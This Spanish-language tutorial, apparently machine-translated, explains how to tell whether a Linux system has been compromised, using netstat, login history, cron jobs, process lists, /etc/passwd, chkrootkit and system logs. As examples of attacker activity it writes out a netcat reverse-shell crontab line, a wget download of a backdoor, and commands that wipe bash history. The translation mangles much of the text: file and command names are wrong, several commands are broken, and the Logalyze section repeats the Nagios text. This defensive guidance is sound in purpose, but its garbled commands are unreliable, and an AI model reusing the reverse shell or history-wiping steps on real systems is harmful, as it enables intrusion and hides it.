Cómo determinar si un sistema Linux está comprometido

Hay muchas razones por las cuales un hacker se abrió paso en su sistema y te causa serios problemas. Hace años, tal vez fue para mostrar las habilidades de uno, pero hoy en día, las intenciones detrás de tales actividades pueden ser mucho más complicadas con consecuencias mucho más amplias para la víctima. Esto puede sonar obvio, pero solo porque "todo parece estar bien", esto no significa que todo esté bien. Los piratas informáticos podrían penetrar su sistema sin hacerle saberlo e infectarlo con malware para tomar el control total, e incluso para el movimiento lateral entre los sistemas. El malware se puede ocultar en el sistema y sirve como trasero o un sistema de comando y control para que los hackers realicen actividades maliciosas en su sistema.Es mejor estar a salvo que curar. Es posible que no se dé cuenta de inmediato de que su sistema ha sido pirateado, pero hay algunas formas en que puede determinar si su sistema está comprometido. Este artículo discutirá cómo determinar si su Linux El sistema ha sido comprometido por una persona no autorizada o un bot está iniciando sesión en su sistema para llevar a cabo actividades maliciosas.

Netstat

NetStat es una importante utilidad de red TCP/IP de línea TCP/IP que proporciona información y estadísticas sobre protocolos en uso y conexiones de red activas.

Usaremos netstat En una máquina de víctimas de ejemplo para verificar algo sospechoso en las conexiones de red activas a través del siguiente comando:

ubuntu@ubuntu: ~ $ netstat -antp

Aquí, veremos todas las conexiones activas actualmente. Ahora, buscaremos un conexión que no debería estar ahí.

Aquí está, una conexión activa en el puerto 44999 (un puerto que no debe estar abierto).Podemos ver otros detalles sobre la conexión, como el Pid, y el nombre del programa se ejecuta en la última columna. En este caso, el Pid es 1555 y la carga útil maliciosa que está ejecutando es la ./caparazón.duende archivo.

Otro comando para verificar los puertos que actualmente escuchan y actualmente en su sistema es el siguiente:

ubuntu@ubuntu: ~ $ netstat -la

Esta es una producción bastante desordenada. Para filtrar las conexiones escuchadas y establecidas, utilizaremos el siguiente comando:

ubuntu@ubuntu: ~ $ netstat -la | Grep "Escuchar" "Establecido"

Esto le dará solo los resultados que le importan, para que pueda clasificar estos resultados más fácilmente. Podemos ver una conexión activa en Puerto 44999 En los resultados anteriores.

Después de reconocer el proceso malicioso, puede matar el proceso a través de los siguientes comandos. Notaremos el Pid del proceso utilizando el comando netstat y mata el proceso a través del siguiente comando:

ubuntu@ubuntu: ~ $ Kill 1555

~.antaño

Linux mantiene un registro del que los usuarios registraron el sistema, desde qué IP, cuándo y por cuánto tiempo.

Puede acceder a esta información con el último dominio. La salida de este comando se vería como sigue:

ubuntu@ubuntu: ~ $ Último

La salida muestra el nombre de usuario en la primera columna, el terminal en el segundo, la dirección fuente en el tercero, el tiempo de inicio de sesión en la cuarta columna y el tiempo total de sesión registrado en la última columna. En este caso, los usuarios usman y ubuntu todavía están conectados. Si ve alguna sesión que no esté autorizada o se vea maliciosa, consulte la última sección de este artículo.

El historial de registro se almacena en ~.antaño archivo. Entonces, el historial se puede eliminar fácilmente eliminando el .antaño archivo. Los atacantes realizan con frecuencia esta acción para cubrir sus pistas.

ubuntu@ubuntu: ~ $ gat .bash_history

Este comando mostrará los comandos ejecutados en su sistema, con el último comando realizado en la parte inferior de la lista.

El historial se puede borrar a través del siguiente comando:

ubuntu@ubuntu: ~ $ History -C

Este comando solo eliminará el historial del terminal que está utilizando actualmente. Entonces, hay una forma más correcta de hacer esto:

ubuntu@ubuntu: ~ $ cat/dev/null> ~/.bash_history

Esto borrará el contenido de la historia pero mantiene el archivo en su lugar. Entonces, si está viendo solo su inicio de sesión actual después de ejecutar el último comando, esta no es una buena señal en absoluto. Esto indica que su sistema puede haber sido comprometido y que el atacante probablemente eliminó la historia.

Si sospecha que un usuario o IP malicioso, inicie sesión como ese usuario y ejecute el comando historia, como sigue:

ubuntu@ubuntu: ~ $ su
ubuntu@ubuntu: ~ $ Historia

Este comando mostrará el historial de comandos leyendo el archivo .antaño en el /hogar carpeta de ese usuario. Busque cuidadosamente wget, rizo, o netcat Comandos, en caso de que el atacante usara estos comandos para transferir archivos o instalar fuera de las herramientas de repo, como criptográficos o bots de spam.

Echa un vistazo al ejemplo a continuación:

Arriba, puedes ver el comando "wget https: // github.com/sajith/mod-rootme." En este comando, el hacker intentó acceder a un archivo de repo fuera de Repo usando wget Para descargar una puerta trasera llamada "Mod-Root Me" e instálelo en su sistema. Este comando en la historia significa que el sistema está comprometido y ha sido trasero por un atacante.

Recuerde, este archivo se puede expulsar fácilmente o producirse su sustancia. Los datos dados por este comando no deben tomarse como una realidad definitiva. Sin embargo, en el caso de que el atacante realizó un comando "malo" y descuidó evacuar la historia, estará allí.

Trabajos cron

Cron Jobs puede servir como una herramienta vital cuando está configurado para configurar una carcasa inversa en la máquina del atacante. Editar trabajos cron es una habilidad importante, y también es saber cómo verlos.

Para ver los trabajos cron que se ejecutan para el usuario actual, utilizaremos el siguiente comando:

ubuntu@ubuntu: ~ $ crontab -l

Para ver los trabajos cron que se ejecutan para otro usuario (en este caso, Ubuntu), utilizaremos el siguiente comando:

ubuntu@ubuntu: ~ $ crontab -u ubuntu -l

Para ver los trabajos cron diarios, por hora, semanales y mensuales, utilizaremos los siguientes comandos:

Jobs de cron diarios:

ubuntu@ubuntu: ~ $ ls -la /etc /cron.a diario

Trabajos cron por hora:

ubuntu@ubuntu: ~ $ ls -la /etc /cron.cada hora

Jobos cron semanales:

ubuntu@ubuntu: ~ $ ls -la /etc /cron.semanalmente

Tomar un ejemplo:

El atacante puede poner un trabajo cron en /etc/crontab Eso ejecuta un comando malicioso 10 minutos más allá de cada hora. El atacante también puede ejecutar un servicio malicioso o una puerta trasera inversa a través de netcat o alguna otra utilidad. Cuando ejecuta el comando $ ~ crontab -l, Verá un trabajo cron en funcionamiento:

ubuntu@ubuntu: ~ $ crontab -l
CT = $ (crontab -l)
Ct = $ ct $ '\ n10 * * * * * nc -e /bin /bash 192.168.8.131 44999 '
printf "$ ct" | crontabista -
ps aux

Para inspeccionar adecuadamente si su sistema se ha visto comprometido, también es importante ver los procesos de ejecución. Hay casos en los que algunos procesos no autorizados no están consumiendo suficiente uso de la CPU para aparecer en el arriba dominio. Ahí es donde usaremos el PD Comando para mostrar todos los procesos de ejecución actualmente.

ubuntu@ubuntu: ~ $ ps auxf

La primera columna muestra al usuario, la segunda columna muestra una ID de proceso única, y el uso de CPU y memoria se muestra en las siguientes columnas.

Esta tabla le proporcionará la mayor información. Debe inspeccionar cada proceso de ejecución para buscar algo peculiar para saber si el sistema está comprometido o no. En el caso de que encuentre algo sospechoso, google o ejecute con el LSOF Comando, como se muestra arriba. Este es un buen hábito para correr PD comandos en su servidor y aumentará sus posibilidades encontrar algo sospechoso o fuera de su rutina diaria.

/etc/passwd

El /etc/passwd El archivo realiza un seguimiento de cada usuario en el sistema. Este es un archivo separado por colon que contiene información como el nombre de usuario, el ID de usuario, la contraseña cifrada, el grupo (GID), el nombre completo del usuario, el directorio de inicio del usuario y el shell de inicio de sesión.

Si un atacante piratea su sistema, existe la posibilidad de que él o ella cree a algunos usuarios más, para mantener las cosas separadas o crear una puerta trasera en su sistema para volver usando esa puerta trasera. Al verificar si su sistema se ha visto comprometido, también debe verificar a todos los usuarios en el archivo /etc /passwd. Escriba el siguiente comando para hacerlo:

ubuntu@ubuntu: ~ $ cat etc/passwd

Este comando le dará una salida similar a la siguiente:

GNOME-Inicial-Setup: X: 120: 65534 ::/Run/gnome-initial-setup/:/bin/false
GDM: X: 121: 125: gnome Display Manager:/var/lib/gdm3:/bin/false
USMAN: X: 1000: 1000: USMAN:/HOME/USMAN:/BIN/BASH
Postgres: X: 122: 128: Administrador de PostgreSQL ,,,,:/var/lib/postgresql:/bin/bash
Debian-Tor: x: 123: 129 ::/var/lib/tor:/bin/false
Ubuntu: X: 1001: 1001: Ubuntu ,,,,/home/ubuntu:/bin/bash
LightDM: X: 125: 132: Light Display Manager:/var/lib/lightdm:/bin/false
Debian-GDM: X: 124: 131: gnome Display Manager:/var/lib/gdm3:/bin/false
Anónimo: x: 1002: 1002: ,,,:/home/anónimo:/bin/bash

Ahora, querrá buscar ningún usuario que no sepa. En este ejemplo, puede ver a un usuario en el archivo llamado "Anónimo."Otra cosa importante a tener en cuenta es que si el atacante creó un usuario para volver a iniciar sesión, el usuario también tendrá un shell"/bin/bash "asignado. Por lo tanto, puede reducir su búsqueda en Gepping la siguiente salida:

ubuntu@ubuntu: ~ $ cat /etc /passwd | Grep -i "/bin/bash"
USMAN: X: 1000: 1000: USMAN:/HOME/USMAN:/BIN/BASH
Postgres: X: 122: 128: Administrador de PostgreSQL ,,,,:/var/lib/postgresql:/bin/bash
Ubuntu: X: 1001: 1001: Ubuntu ,,,,/home/ubuntu:/bin/bash
Anónimo: x: 1002: 1002: ,,,:/home/anónimo:/bin/bash

Puedes realizar más "Bash Magic" para refinar tu producción.

ubuntu@ubuntu: ~ $ cat /etc /passwd | Grep -i "/bin/bash" | cortar -d ":" -f 1
usman
post -put
ubuntu
anónimo

Encontrar

Las búsquedas basadas en el tiempo son útiles para el triaje rápido. El usuario también puede modificar el archivo de cambio de marca de archivo. Para mejorar la confiabilidad, incluya ctime en los criterios, ya que es mucho más difícil manipular porque requiere modificaciones de algunos archivos de nivel.

Puede usar el siguiente comando para encontrar archivos creados y modificados en los últimos 5 días:

ubuntu@ubuntu: ~ $ find / -mtime -o -cTime -5

Para encontrar todos los archivos Suid propiedad de la raíz y verificar si hay entradas inesperadas en las listas, usaremos el siguiente comando:

ubuntu@ubuntu: ~ $ find / -perm -4000 -user root -type F

Para encontrar todos los archivos SGID (establecer ID de usuario) propiedad de la raíz y verificar si hay entradas inesperadas en las listas, usaremos el siguiente comando:

ubuntu@ubuntu: ~ $ find / -perm -6000 -type F

Chkrootkit

Raíz son una de las peores cosas que pueden sucederle a un sistema y son uno de los ataques más peligrosos, más peligrosos que el malware y los virus, tanto en el daño que causan al sistema como a la dificultad para encontrarlos y detectarlos.

Están diseñados de tal manera que permanecen ocultos y hacen cosas maliciosas como robar tarjetas de crédito e información bancaria en línea. Raíz Dé a los cibercriminales la capacidad de controlar su sistema informático. RootKits también ayuda al atacante a monitorear sus pulsaciones de teclas y deshabilitar su software antivirus, lo que hace que sea aún más fácil robar su información privada.

Estos tipos de malware pueden permanecer en su sistema durante mucho tiempo sin que el usuario no se dé cuenta, y puede causar daños graves. Una vez el Raíz se detecta, no hay otra forma que reinstalar todo el sistema. A veces estos ataques pueden incluso causar falla de hardware.

Afortunadamente, hay algunas herramientas que pueden ayudar a detectar Raíz En sistemas Linux, como Lynis, Clam AV o LMD (Linux Malware Detect). Puede verificar su sistema para conocer Raíz Usando los comandos a continuación.

Primero, instalar Chkrootkit a través del siguiente comando:

ubuntu@ubuntu: ~ $ sudo apt install chkrootkit

Esto instalará el Chkrootkit herramienta. Puede usar esta herramienta para verificar si hay rootkits a través del siguiente comando:

ubuntu@ubuntu: ~ $ sudo chkrootkit

El paquete chkrootkit consiste en un script de shell que verifica los binarios del sistema para la modificación de RootKit, así como varios programas que verifican varios problemas de seguridad. En el caso anterior, el paquete verificó un signo de rootkit en el sistema y no encontró ninguno. Bueno, esa es una buena señal!

Registros de Linux

Los registros de Linux ofrecen un horario de eventos en el marco de trabajo de Linux y las aplicaciones, y son un instrumento de investigación importante cuando experimenta problemas. La tarea principal que un administrador debe realizar cuando él o ella se entera de que el sistema está comprometido debe estar diseccionando todos los registros de registro.

Para los problemas explícitos de la aplicación de área de trabajo, los registros de registro se mantienen en contacto con varias áreas. Por ejemplo, Chrome compone informes de bloqueo a '~/.informes de Chrome/Crash '), Cuando una aplicación de área de trabajo compone registros que dependen del ingeniero, y muestra si la aplicación tiene en cuenta el acuerdo de registro personalizado. Los registros están en el/var/log directorio. Hay registros de Linux para todo: marco, porción, paquete de jefes, formularios de arranque, xorg, apache y mysql. En este artículo, el tema se concentrará explícitamente en los registros de marco de Linux.

Puede cambiar a este catálogo utilizando el orden de disco compacto. Debe tener permisos raíz para ver o cambiar los archivos de registro.

ubuntu@ubuntu: ~ $ cd /var /log

Instrucciones para ver registros de Linux

Utilice los siguientes comandos para ver los documentos de registro necesarios.

Los registros de Linux se pueden ver con el comando CD /VAR /LOG, En ese punto, componiendo la orden de ver los registros guardados debajo de este catálogo. Uno de los registros más importantes es el syslog, que registra muchos registros importantes.

ubuntu@ubuntu: gato syslog

Para desinfectar la salida, usaremos el "menos" dominio.

Ubuntu@ubuntu: Cat Syslog | menos

Escriba el comando var/log/syslog para ver bastantes cosas bajo el archivo syslog. Centrarse en un tema en particular llevará algún tiempo, ya que este registro generalmente será largo. Presione Shift+G para desplazarse hacia abajo en el registro para finalizar, significado por "Fin."

También puede ver los registros por medio de DMESG, que imprime el soporte del anillo de piezas. Esta función imprime todo y lo envía lo más lejos posible en el documento. Desde ese momento, puede utilizar el pedido dmesg | menos para mirar a través del rendimiento. En el caso de que necesite ver los registros para el usuario dado, deberá ejecutar el siguiente comando:

dmesg - facilidad = usuario

En conclusión, puede utilizar la orden de cola para ver los documentos de registro. Es una utilidad pequeña pero útil que uno puede usar, ya que se usa para mostrar la última parte de los registros, donde el problema probablemente ocurrió. También puede especificar el número de últimos bytes o líneas para mostrar en el comando de cola. Para esto, utilice el comando cola/var/log/syslog. Hay muchas maneras de mirar los registros.

Para un número particular de líneas (el modelo considera las últimas 5 líneas), ingrese el siguiente comando:

ubuntu@ubuntu: ~ $ tail -f -n 5/var/log/syslog

Esto imprimirá las últimas 5 líneas. Cuando llegue otra línea, la primera será evacuada. Para alejarse del orden de cola, presione Ctrl+X.

Informes importantes de Linux

Los cuatro registros principales de Linux incluyen:

1. Registros de la aplicación
2. Registros de eventos
3. Registros de servicio
4. Registros del sistema

Ubuntu@ubuntu: Cat Syslog | menos

• /var/log/syslog o /var/log/mensajes: Mensajes generales, al igual que los datos relacionados con el marco. Este registro almacena toda la información de acción en el marco mundial.

ubuntu@ubuntu: auth.registro | menos

• /var/log/auth.registro o /var/log/seguro: Registros de verificación de almacenamiento, incluidos inicios de sesión y estrategias de validación efectivas y fizzadas. Debian y Ubuntu usan /var/log/auth.registro Para almacenar intentos de inicio de sesión, mientras que Redhat y Centos usan /var/log/seguro Para almacenar registros de autenticación.

ubuntu@ubuntu: bota de gato.registro | menos

• /var/log/boot.registro: contiene información sobre el arranque y los mensajes durante el inicio.

ubuntu@ubuntu: Cat Maillog | menos

• /var/log/maillog o /var/log/mail.registro: almacena todos los registros identificados con servidores de correo; valioso cuando necesita datos sobre Postfix, SMTPD o cualquier administración relacionada con el correo electrónico que se ejecute en su servidor.

ubuntu@ubuntu: Cat Kern | menos

• /var/log/kern: contiene información sobre los registros del núcleo. Este registro es importante para investigar porciones personalizadas.

ubuntu@ubuntu: Cat Dmesg | menos

• /var/log/dmesg: contiene mensajes que identifican los controladores de gadgets. El pedido DMESG se puede utilizar para ver mensajes en este registro.

ubuntu@ubuntu: Cat Faillog | menos

• /var/log/faillog: Contiene datos sobre todos los intentos de inicio de sesión efervados, valioso para recoger fragmentos de conocimiento sobre intentos de penetraciones de seguridad; Por ejemplo, aquellos que buscan piratear certificaciones de inicio de sesión, justo cuando Animal Power asalta.

ubuntu@ubuntu: Cat Cron | menos

• /var/log/cron: almacena todos los mensajes relacionados con Cron; Empleos de Cron, por ejemplo, o cuando el Cron Daemon comenzó una vocación, mensajes de decepción relacionados, etc.

ubuntu@ubuntu: Cat Yum.registro | menos

• /var/log/yum.registro: En el caso de que introduzca paquetes que utilizan el orden YUM, este registro almacena todos los datos relacionados, lo que puede ser útil para decidir si se introdujeron un paquete y todos los segmentos de manera efectiva.

ubuntu@ubuntu: Cat httpd | menos

• /var/log/httpd/o/var/log/apache2: Estos dos directorios se utilizan para almacenar todo tipo de registros para un servidor HTTP Apache, incluidos registros de acceso y registros de errores. El archivo ERROR_LOG contiene todas las solicitudes malas recibidas por el servidor HTTP. Estos errores incorporan problemas de memoria y otros errores relacionados con el marco. El access_log contiene un registro de todas las solicitudes recibidas a través de HTTP.

Ubuntu@ubuntu: Cat Mysqld.registro | menos

• /var/log/mysqld.registro o/var/log/mysql.registro : El documento de registro MySQL que registra todos los mensajes de falla, depuración y éxito. Esta es otra ocurrencia en la que el marco dirige al registro; Redhat, Centos, Fedora y otros marcos basados ​​en Redhat usan/var/log/mysqld.Registro, mientras que Debian/Ubuntu utiliza el/var/log/mysql.catálogo de registro.

Herramientas para ver los registros de Linux

Hay muchos rastreadores de registro de código abierto y dispositivos de examen accesibles hoy en día, lo que hace que la elección de los activos correctos para los registros de acción sea más simple de lo que podría sospechar. Los verificadores de registro de código abierto y gratuito pueden trabajar en cualquier sistema para hacer el trabajo. Aquí hay cinco de los mejores que he utilizado en el pasado, en ningún orden específico.

• GrayLog

Comenzada en Alemania en 2011, GrayLog ahora se ofrece actualmente como un dispositivo de código abierto o un acuerdo comercial. GrayLog está destinado a ser un marco de registro de registro que recibe flujos de información de diferentes servidores o puntos finales y le permite leer o descomponer rápidamente esos datos.

GrayLog ha ensamblado una notoriedad positiva entre los cabezales del marco como resultado de su simplicidad y versatilidad. La mayoría de las empresas web comienzan poco, pero pueden desarrollarse exponencialmente. GrayLog puede ajustar las pilas sobre un sistema de servidores de backend y manejar algunos terabytes de información de registro todos los días.

Los presidentes verán la parte delantera de la interfaz GrayLog como simple de utilizar y vigoroso en su utilidad. GrayLog funciona alrededor de la idea de los paneles, que permite a los usuarios elegir el tipo de medidas o fuentes de información que encuentran importantes y observan rápidamente las inclinaciones después de algún tiempo.

Cuando se produce un episodio de seguridad o ejecución, los presidentes de TI deben tener la opción de seguir las manifestaciones a un conductor subyacente lo más rápido que podría esperarse razonablemente. La función de búsqueda de Graylog hace que esta tarea sea simple. Esta herramienta ha funcionado en la adaptación a la falla interna que puede ejecutar empresas multi-stung para que puedan desglosar algunos peligros potenciales juntos.

• Nagios

Iniciado por un solo desarrollador en 1999, Nagios ha avanzado desde entonces en uno de los instrumentos de código abierto más sólidos para supervisar la información de registro. La presente interpretación de NAGIOS se puede implementar en servidores que ejecutan cualquier tipo de sistema operativo (Linux, Windows, etc.).

El elemento esencial de Nagios es un servidor de registro, que optimiza el surtido de información y pone los datos progresivamente disponibles para los ejecutivos de marco. El Nagios Log Server Motor captará la información gradualmente y la alimentará en un instrumento de búsqueda innovador. Incorporar con otro punto final o aplicación es una simple propina para este asistente de disposición inherente.

Nagios se utiliza con frecuencia en asociaciones que necesitan detectar la seguridad de sus vecindarios y pueden revisar un alcance de ocasiones relacionadas con el sistema para ayudar a robotizar el transporte de precauciones. Nagios se puede programar para realizar tareas específicas cuando se cumplen una determinada condición, lo que permite a los usuarios detectar problemas incluso antes de que se incluyan las necesidades de un humano.

Como un aspecto importante de la evaluación del sistema, Nagios canalizará la información de registro dependiente del área geográfica donde comienza. Los paneles completos con innovación de mapeo se pueden implementar para ver la transmisión de tráfico web.

• Logalizar

Logalyze fabrica herramientas de código abierto para directores de marco o administradores de sys y especialistas en seguridad para ayudarlos a supervisar los registros del servidor y permitirles concentrarse en transformar los registros en información valiosa. El elemento esencial de esta herramienta es que se puede acceder como una descarga gratuita para uso en casa o comercial.

El elemento esencial de Nagios es un servidor de registro, que optimiza el surtido de información y pone los datos progresivamente disponibles para los ejecutivos de marco. El Nagios Log Server Motor captará la información gradualmente y la alimentará en un instrumento de búsqueda innovador. Incorporar con otro punto final o aplicación es una simple propina para este asistente de disposición inherente.

Nagios se utiliza con frecuencia en asociaciones que necesitan detectar la seguridad de sus vecindarios y pueden revisar un alcance de ocasiones relacionadas con el sistema para ayudar a robotizar el transporte de precauciones. Nagios se puede programar para realizar tareas específicas cuando se cumplen una determinada condición, lo que permite a los usuarios detectar problemas incluso antes de que se incluyan las necesidades de un humano.

Como un aspecto importante de la evaluación del sistema, Nagios canalizará la información de registro dependiente del área geográfica donde comienza. Los paneles completos con innovación de mapeo se pueden implementar para ver la transmisión de tráfico web.

¿Qué debes hacer si te han comprometido??

Lo principal es no entrar en pánico, particularmente si la persona no autorizada se registra en este momento. Debe tener la opción de recuperar el control de la máquina antes de que la otra persona sepa que sabe sobre ellos. En el caso de que sepan que es consciente de su presencia, el atacante puede mantenerlo fuera de su servidor y comenzar a destruir su sistema. Si no es tan técnico, entonces todo lo que debe hacer es cerrar todo el servidor inmediatamente. Puede apagar el servidor a través de los siguientes comandos:

ubuntu@ubuntu: ~ $ shutdown -h ahora

O

ubuntu@ubuntu: ~ $ systemctl poweroff

Otra forma de hacerlo es iniciando sesión en el panel de control de su proveedor de alojamiento y cerrándolo desde allí. Una vez que el servidor está apagado, puede trabajar en las reglas de firewall que se necesitan y consultar con cualquier persona para obtener ayuda en su propio tiempo.

En caso de que se sienta más seguro y su proveedor de alojamiento tenga un firewall ascendente, luego cree y habilite siguiendo dos reglas:

• Permitir el tráfico SSH solo desde su dirección IP.
• Bloquear todo lo demás, no solo SSH sino cada protocolo que se ejecuta en cada puerto.

Para verificar las sesiones SSH activas, use el siguiente comando:

ubuntu@ubuntu: ~ $ ss | grep ssh

Use el siguiente comando para matar su sesión SSH:

ubuntu@ubuntu: ~ $ Kill

Esto matará su sesión SSH y le dará acceso al servidor. En caso de que no tenga acceso a un firewall ascendente, tendrá que crear y habilitar las reglas de firewall en el servidor en sí. Luego, cuando se configuran las reglas del firewall, mata la sesión SSH del usuario no autorizada a través del comando "Kill".

Una última técnica, cuando esté disponible, inicie sesión en el servidor mediante una conexión fuera de banda, como una consola en serie. Detenga todas las redes a través del siguiente comando:

ubuntu@ubuntu: ~ $ SystemCtl Stop Network.servicio

Esto detendrá completamente cualquier sistema, por lo que ahora podrá habilitar los controles de firewall en su propio tiempo.

Una vez que recupere el control del servidor, no confíe fácilmente en él. No intentes arreglar las cosas y reutilizarlas. Lo que está roto no se puede solucionar. Nunca sabría lo que un atacante podría hacer, por lo que nunca debe estar seguro de que el servidor esté seguro. Entonces, la reinstalación debería ser su paso final.